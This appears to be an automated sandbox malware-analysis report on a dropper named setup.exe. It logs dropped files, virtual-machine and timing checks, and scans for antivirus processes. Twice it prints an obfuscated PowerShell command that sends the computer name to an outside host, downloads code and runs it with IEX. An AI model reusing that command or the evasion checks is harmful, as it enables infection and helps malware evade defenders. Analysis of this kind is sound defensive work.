          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: shdocvw.dll
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpWindow found: window name: TMainForm
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: setup.exeStatic file information: File size 2097152 > 1048576
          Source: setup.exeStatic PE information: Raw size of CODE is bigger than: 0x100000 < 0x127600
          Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb< source: powershell.exe, 00000004.00000002.2025410025.0000000007B00000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000025.00000002.2630130507.0000000038B80000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000025.00000002.2608357889.0000000003738000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: BrightLib.exe, 00000025.00000002.2630130507.0000000038B80000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000025.00000002.2608357889.0000000003738000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ?
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.6.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.8.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
          Source: setup.exeStatic PE information: real checksum: 0x285347 should be: 0x204747
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drStatic PE information: real checksum: 0x9307ce should be: 0x8615ed
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.drStatic PE information: section name: .didata
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.6.drStatic PE information: section name: .didata
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp.8.drStatic PE information: section name: .didata
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007F0CFD push eax; mov dword ptr [esp], 60636255h0_2_007F0D00
          Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_007EDCBD push eax; mov dword ptr [esp], 0B08090Eh0_2_007EDCCB
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03704900 push ds; retf 0007h4_2_037049B2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_037044F7 push ss; retf 0007h4_2_03704502
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_037044C7 push ss; retf 0007h4_2_037044F2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03705B63 push edi; retf 0007h4_2_03705B7A
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03705B43 push ebp; retf 0007h4_2_03705B4A
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03705B4F push esi; retf 0007h4_2_03705B5A
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03705B25 push ebp; retf 0007h4_2_03705B3A
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03705A7F push eax; retf 0007h4_2_03705A8A
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03705AFF push esp; retf 0007h4_2_03705B0A
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03705ADF push ebx; retf 0007h4_2_03705AEA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03705ACF push ebx; retf 0007h4_2_03705ADA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03705AAF push ecx; retf 0007h4_2_03705ABA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03703A9B push ebx; retf 4_2_03703ADA
          Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeFile created: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exeFile created: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-MO41V.tmp\_isetup\_setup64.tmp
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-MO41V.tmp\_isetup\_isdecmp.dll
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\is-T64JA.tmp
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-EUFB2.tmp\_isetup\_isdecmp.dll
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-EUFB2.tmp\_isetup\_setup64.tmp

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Users\user\Desktop\setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
          Source: C:\Users\user\Desktop\setup.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
          Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\setup.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
          Source: C:\Users\user\Desktop\setup.exe System information queried: FirmwareTableInformation
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe API/Special instruction interceptor: Address: 6BC57C44
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe RDTSC instruction interceptor: First address: 6BC5F3E1 second address: 6BC5F3FD instructions:
              0x00000000 rdtsc
              0x00000002 mov dword ptr [ebp-20h], eax
              0x00000005 mov dword ptr [ebp-1Ch], edx
              0x00000008 lea esi, dword ptr [ebp-38h]
              0x0000000b xor eax, eax
              0x0000000d xor ecx, ecx
              0x0000000f cpuid
              0x00000011 mov dword ptr [esi], eax
              0x00000013 mov dword ptr [esi+04h], ebx
              0x00000016 mov dword ptr [esi+08h], ecx
              0x00000019 mov dword ptr [esi+0Ch], edx
              0x0000001c rdtsc
          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe RDTSC instruction interceptor: First address: 6BC5F3FD second address: 6BC5F3E1 instructions:
              0x00000000 rdtsc
              0x00000002 mov dword ptr [ebp-18h], eax
              0x00000005 mov dword ptr [ebp-14h], edx
              0x00000008 mov eax, dword ptr [ebp-18h]
              0x0000000b sub eax, dword ptr [ebp-20h]
              0x0000000e mov ecx, dword ptr [ebp-14h]
              0x00000011 sbb ecx, dword ptr [ebp-1Ch]
              0x00000014 add eax, dword ptr [ebp-10h]
              0x00000017 adc ecx, dword ptr [ebp-0Ch]
              0x0000001a mov dword ptr [ebp-10h], eax
              0x0000001d mov dword ptr [ebp-0Ch], ecx
              0x00000020 jmp 00007F1EA54681E5h
              0x00000022 mov edx, dword ptr [ebp-04h]
              0x00000025 add edx, 01h
              0x00000028 mov dword ptr [ebp-04h], edx
              0x0000002b cmp dword ptr [ebp-04h], 64h
              0x0000002f jnl 00007F1EA5468270h
              0x00000031 rdtsc
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5519
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4310
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MO41V.tmp\_isetup\_setup64.tmp
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MO41V.tmp\_isetup\_isdecmp.dll
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EUFB2.tmp\_isetup\_isdecmp.dll
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-EUFB2.tmp\_isetup\_setup64.tmp
          Source: C:\Users\user\Desktop\setup.exe TID: 7388 Thread sleep time: -210000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756 Thread sleep count: 5519 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7752 Thread sleep count: 4310 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7788 Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Users\user\Desktop\setup.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: setup.exe, 00000000.00000003.1828202359.0000000000917000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900295071.000000000091A000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2085467955.000000000091A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWEFn
          Source: setup.exe, 00000000.00000002.2078744236.00000000008CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
          Source: powershell.exe, 00000004.00000002.2025410025.0000000007B00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
          Source: powershell.exe, 00000004.00000002.2014602281.0000000005584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.exe.0.dr Binary or memory string: puQEMus
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000002.2117698700.000000000146C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD00#4&22
          Source: powershell.exe, 00000004.00000002.2014602281.0000000005584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
          Source: setup.exe, 00000000.00000003.1828202359.0000000000917000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp, 00000007.00000002.2117698700.000000000143C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}~^g
          Source: powershell.exe, 00000004.00000002.2025410025.0000000007ACD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VallSecurityFMSFT_NetEventVmNetworkAdatper.format.ps1xml
          Source: powershell.exe, 00000004.00000002.2025410025.0000000007ACD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Fule.cmdletDeMSFT_NetEventVmNetworkAdatper.cdxml
          Source: powershell.exe, 00000004.00000002.2014602281.0000000005584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
          Source: C:\Users\user\Desktop\setup.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_007B03B0 mov edx, dword ptr fs:[00000030h] 0_2_007B03B0
          Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_007B0970 mov eax, dword ptr fs:[00000030h] 0_2_007B0970
          Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_007B0D20 mov eax, dword ptr fs:[00000030h] 0_2_007B0D20
          Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_007B0FC0 mov eax, dword ptr fs:[00000030h] 0_2_007B0FC0
          Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_007B0FBF mov eax, dword ptr fs:[00000030h] 0_2_007B0FBF
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe NtQuerySystemInformation: Direct from: 0x4585B0
          Source: C:\Users\user\AppData\Local\Temp\is-87VLI.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp Process created: C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe "C:\Users\user\AppData\Local\Temp\F3638EZUZ711WUU8SDVPW34XAAMUZ.exe" /VERYSILENT
          Source: C:\Users\user\AppData\Local\Temp\is-DJ3IP.tmp\F3638EZUZ711WUU8SDVPW34XAAMUZ.tmp Process created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
          Source: C:\Users\user\Desktop\setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; ?
          Source: setup.exe Binary or memory string: ProgMan
